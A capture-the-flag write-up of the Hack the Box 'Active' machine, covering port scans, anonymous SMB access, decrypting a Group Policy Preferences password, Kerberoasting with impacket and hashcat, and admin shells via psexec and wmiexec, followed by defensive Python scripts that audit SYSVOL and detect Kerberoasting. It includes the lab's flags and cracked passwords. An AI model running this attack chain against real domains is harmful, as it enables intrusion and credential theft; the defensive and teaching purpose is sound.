## Hack the Box - Active

```text
Machine IP: 10.10.10.100
User: 43c4ac25717a662efc45a37f8631dddf
Root: c632b7cc9276812c85afabafe6182d94
```

#### 1. NMAP (Surface)

```text
# Nmap 7.93 scan initiated Tue Mar 28 13:13:14 2023 as: nmap -Pn -sS -p- -T4 --min-rate 1000 -oN nmap.surface 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.091s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown
49171/tcp open  unknown
49177/tcp open  unknown

# Nmap done at Tue Mar 28 13:14:19 2023 -- 1 IP address (1 host up) scanned in 65.05 seconds
```

#### 2. NMAP (Deep)

```text
# Nmap 7.93 scan initiated Tue Mar 28 13:17:30 2023 as: nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49177 -oN nmap.deep 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.087s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-03-28 07:47:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49177/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-03-28T07:48:33
|_  start_date: 2023-03-28T07:38:38

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 28 13:18:43 2023 -- 1 IP address (1 host up) scanned in 72.55 seconds
```

---

#### 3. SMBmap/ SMBclient (II Methods)

##### Method I

```bash
▶ smbmap -H 10.10.10.100
```

- Using the above command, `smbmap` will try to access the file shares and list the ones that are accessible via "anonymous" login.

![image](https://user-images.githubusercontent.com/83878909/228279272-d8531119-1230-4bd1-9a9f-d7bbde5a4c4e.png)

##### Method II

```bash
▶ smbclient -L //10.10.10.100
```

- Using the above command, `smbclient` will try to access the file shares and list the ones that are accessible via "anonymous" login.

![image](https://user-images.githubusercontent.com/83878909/228278975-a07028f8-f1c5-4486-8ca7-ce5f54f4c2d7.png)

---

#### 4. SMBclient

```bash
▶ smbclient //10.10.10.100/Replication -c 'recurse;ls'
```

- Using the above command, `smbclient` will go through all the files present in the file share and list them out.

![image](https://user-images.githubusercontent.com/83878909/228280988-fa36389b-3eda-4d64-97a9-899b97dd7fb9.png)

![image](https://user-images.githubusercontent.com/83878909/228281855-9259b198-3dd2-407a-b25b-00b23fbf4a83.png)

---

#### 5. Credentials

```bash
▶ smbclient //10.10.10.100/Replication
```

- Using `smbclient`, log in as an "anonymous" user and download the `Groups.xml` file.

![image](https://user-images.githubusercontent.com/83878909/228287259-11261de2-c4c2-44d8-a4ed-a44cbe89d76f.png)

---

#### 6. Decrypt

```bash
▶ gpp-decrypt {HASH}
```

- Decrypt the hash found in `Groups.xml` to obtain a clear text password.

![image](https://user-images.githubusercontent.com/83878909/228287533-95917512-20fd-46fb-a0af-14d50709215b.png)

- Credentials: `svc_tgs : GPPstillStandingStrong2k18`
- `TGS`: Ticket Granting Service

---

#### 7. SMBmap

```bash
▶ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100
```

- Using `smbmap` with valid user credentials to check for file shares which were previously not accessible with "anonymous".

![image](https://user-images.githubusercontent.com/83878909/228297680-9b0378e2-905c-4647-b3f4-1bde845a69ea.png)

---

#### 8. Extract SPNs and TGS Ticket

```bash
▶ impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
```

- SPNs are used by services in an AD environment to identify themselves to the Kerberos authentication service. By extracting the SPNs associated with user accounts, an attacker can request Kerberos service tickets for those accounts.
- This command specifically retrieves Service Principal Names (SPNs) for user accounts that are used as service accounts and sends a request to the domain controller to obtain a TGS ticket (a.k.a. TGT) for the `SVC_TGS` user account, which is used as a service account in the `active.htb` domain.

![image](https://user-images.githubusercontent.com/83878909/228320723-7f8d729a-b79a-43e0-8f22-8f95fadfcff5.png)

---

#### 9. Crack Hash

```bash
▶ hashcat -m 13100 ticket.hash /usr/share/wordlists/rockyou.txt
```

- Crack the hash to obtain a clear text password.

![image](https://user-images.githubusercontent.com/83878909/228336517-57048f34-213d-4463-9ae9-0331dcc8abd8.png)

---

#### 10. SMBmap

```bash
▶ smbmap -u Administrator -p Ticketmaster1968 -H 10.10.10.100
```

- Using `smbmap` with the found credentials of the user "Administrator" to check for file shares.

![image](https://user-images.githubusercontent.com/83878909/228337905-9238f25f-c1e0-4079-8367-fbfd9471e721.png)

---

#### 11. PSexec/ WMIexec (II Methods)

##### Method I

```bash
▶ impacket-psexec active.htb/Administrator@10.10.10.100
```

- Using `impacket-psexec` to establish a connection to the remote machine, authenticate using the "Administrator" credentials, and then spawn a shell on the remote machine.

![image](https://user-images.githubusercontent.com/83878909/228338846-2fcf6515-8cb8-4eee-9d1c-e4a824d47af6.png)

##### Method II

```bash
▶ impacket-wmiexec active.htb/administrator:Ticketmaster1968@10.10.10.100
```

- Using `impacket-wmiexec` to spawn a shell on the remote machine via the Windows Management Instrumentation (WMI) service.

![image](https://user-images.githubusercontent.com/83878909/228341228-e261a5cd-8023-4000-989b-25b8176331bf.png)

---

###### References:

- [Group Policy Preferences](https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/)
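Steps 5 and 6 above work because the `cpassword` attribute in a Group Policy Preferences file is encrypted with an AES key that Microsoft published (that is all `gpp-decrypt` needs), so any such value still sitting in SYSVOL is effectively a disclosed credential (MS14-025). From the defender's side the useful check is an audit of SYSVOL for those attributes. The script below is an added example, not part of this writeup or of any tool it uses: it walks a copy of SYSVOL, parses the GPP item types that can carry `cpassword`, and reports which accounts have a stored credential without printing the value. The embedded `Groups.xml` sample is constructed with placeholder values; the `EXAMPLE\svc_example` account and the cpassword string are not from the box.

```python
"""Audit GPP XML files in SYSVOL for embedded cpassword attributes (MS14-025).

Added example, not code from the writeup. Stdlib only; point it at a mounted or
copied SYSVOL tree, or run it with no argument to audit the constructed sample.
"""
import os
import sys
import xml.etree.ElementTree as ET

# GPP preference item files that may carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Attribute names the different item types use for the account the password belongs to
# (assumed from the published GPP schemas; the item's own "name" is the fallback).
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element whose Properties carry a non-empty cpassword."""
    root = ET.fromstring(xml_text)
    # ElementTree has no parent pointers, so build the map once per document.
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for props in root.iter("Properties"):
        cpassword = props.get("cpassword", "")
        if not cpassword:
            continue  # empty cpassword means no credential is stored for this item
        item = parent_of.get(props)
        account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), None)
        item_name = item.get("name") if item is not None else None
        findings.append({
            "file": source,
            "item": item.tag if item is not None else props.tag,
            "name": item_name,
            "account": account or item_name,
            "changed": item.get("changed") if item is not None else None,
            "cpassword_len": len(cpassword),  # report presence only, never the value
        })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy and audit every GPP XML file that can hold a cpassword."""
    findings = []
    for dirpath, _, filenames in os.walk(root_dir):
        for fn in filenames:
            if fn in GPP_FILES:
                path = os.path.join(dirpath, fn)
                try:
                    # GPP files are written UTF-8 with a BOM; utf-8-sig strips it.
                    with open(path, encoding="utf-8-sig") as fh:
                        findings.extend(find_cpasswords(fh.read(), path))
                except ET.ParseError as exc:
                    print(f"skipping unparsable {path}: {exc}", file=sys.stderr)
    return findings


# Constructed sample in the shape of a Groups.xml preference item (placeholder values only).
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="EXAMPLE\\svc_example"
        changed="2018-07-18 20:46:06" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" cpassword="PLACEHOLDER_BASE64_CPASSWORD_VALUE=="
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="EXAMPLE\\svc_example"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="EXAMPLE\\localadmin"
        changed="2018-07-18 20:47:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" cpassword="" userName="EXAMPLE\\localadmin"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = scan_sysvol(target) if target else find_cpasswords(SAMPLE_GROUPS_XML, "sample")
    for f in results:
        print(f"{f['file']}: {f['item']} '{f['name']}' stores a cpassword for {f['account']} "
              f"(changed {f['changed']}, {f['cpassword_len']} chars)")
```

Run as `python gpp_audit.py /path/to/SYSVOL`; every finding is a credential to rotate, after which the preference item should be deleted rather than edited, since the stored value stays readable to any domain user until the file is gone from SYSVOL. The `changed` timestamp shows how long the value has been exposed.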
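Steps 8 and 9 above are Kerberoasting: any authenticated domain user can ask the KDC for a service ticket for an SPN registered on a user account, and when that ticket comes back RC4-encrypted it can be cracked offline against the account's password. On the domain controller this leaves Security event 4769 with `TicketEncryptionType` 0x17 and a `ServiceName` that is a user account rather than a machine account. The detection logic below is an added example, not part of this writeup: it assumes 4769 events have already been exported to dicts keyed by the field names from the event XML (plus a `TimeCreated` ISO timestamp), and the records it runs over are constructed. It flags RC4 user-SPN tickets and rates a requester higher when it pulled tickets for several distinct services in one go, which is exactly what `impacket-GetUserSPNs -request` does.

```python
"""Flag Kerberoasting-style TGS requests in exported Security event 4769 records.

Added example, not code from the writeup. Input records are dicts with the 4769
field names (TargetUserName, ServiceName, TicketEncryptionType, IpAddress,
Status) plus an ISO TimeCreated; the sample below is constructed.
"""
from collections import defaultdict
from datetime import datetime

RC4_HMAC = "0x17"    # etype 23: the ticket type the tooling on this page requests
KDC_SUCCESS = "0x0"  # Status of a granted ticket; failures issue nothing to crack


def is_roastable_request(ev):
    """True for a granted RC4 TGS whose service is a user account.

    Machine accounts (name ends with '$') and krbtgt are excluded: their keys are
    long and random, so tickets for them are not a realistic cracking target."""
    service = ev.get("ServiceName", "")
    return (ev.get("EventID") == 4769
            and ev.get("Status") == KDC_SUCCESS
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not service.endswith("$")
            and service.lower() != "krbtgt")


def kerberoast_alerts(events, high_threshold=3):
    """Group roastable requests by requesting user + source IP and rate each group.

    A single RC4 user-SPN ticket can be legitimate on a domain that still allows
    RC4; several distinct services from one requester is the shape of an SPN sweep."""
    groups = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            groups[(ev["TargetUserName"], ev["IpAddress"])].append(ev)
    alerts = []
    for (user, ip), evs in groups.items():
        times = sorted(datetime.fromisoformat(e["TimeCreated"]) for e in evs)
        services = sorted({e["ServiceName"] for e in evs})
        alerts.append({
            "requester": user, "ip": ip, "services": services,
            "first": times[0].isoformat(), "last": times[-1].isoformat(),
            "severity": "high" if len(services) >= high_threshold else "medium",
        })
    alerts.sort(key=lambda a: (-len(a["services"]), a["requester"]))
    return alerts


def _ev(t, user, ip, service, etype, status="0x0"):
    """Build one constructed 4769 record."""
    return {"EventID": 4769, "TimeCreated": t, "TargetUserName": user, "IpAddress": ip,
            "ServiceName": service, "TicketEncryptionType": etype, "Status": status}


# Constructed sample: one requester sweeping three user SPNs, plus benign noise.
SAMPLE_4769 = [
    _ev("2023-03-28T09:00:01", "svc_example@EXAMPLE.LOCAL", "10.0.0.50", "svc_sql", "0x17"),
    _ev("2023-03-28T09:00:01", "svc_example@EXAMPLE.LOCAL", "10.0.0.50", "svc_web", "0x17"),
    _ev("2023-03-28T09:00:02", "svc_example@EXAMPLE.LOCAL", "10.0.0.50", "svc_backup", "0x17"),
    _ev("2023-03-28T09:00:10", "svc_example@EXAMPLE.LOCAL", "10.0.0.50", "DC01$", "0x12"),  # machine account, AES
    _ev("2023-03-28T09:01:00", "alice@EXAMPLE.LOCAL", "10.0.0.7", "krbtgt", "0x12"),        # TGT, not a service
    _ev("2023-03-28T09:02:00", "bob@EXAMPLE.LOCAL", "10.0.0.8", "svc_sql", "0x12"),         # AES: normal access
    _ev("2023-03-28T09:03:00", "carol@EXAMPLE.LOCAL", "10.0.0.9", "svc_web", "0x17"),       # one RC4 ticket
    _ev("2023-03-28T09:04:00", "dave@EXAMPLE.LOCAL", "10.0.0.10", "svc_web", "0x17", "0x12"),  # non-zero Status, nothing issued
]

if __name__ == "__main__":
    for a in kerberoast_alerts(SAMPLE_4769):
        print(f"[{a['severity']}] {a['requester']} from {a['ip']} was issued RC4 TGS for "
              f"{len(a['services'])} user SPN(s) {a['services']} between {a['first']} and {a['last']}")
```

The rule keys on the RC4 downgrade, so a requester that asks for AES tickets against AES-enabled service accounts is not caught by it; the complementary mitigations are the ones the rule implies: long random passwords (or gMSA) on every account that carries an SPN, AES-only encryption types on those accounts, and an alert on any 0x17 ticket once RC4 has been disabled domain-wide.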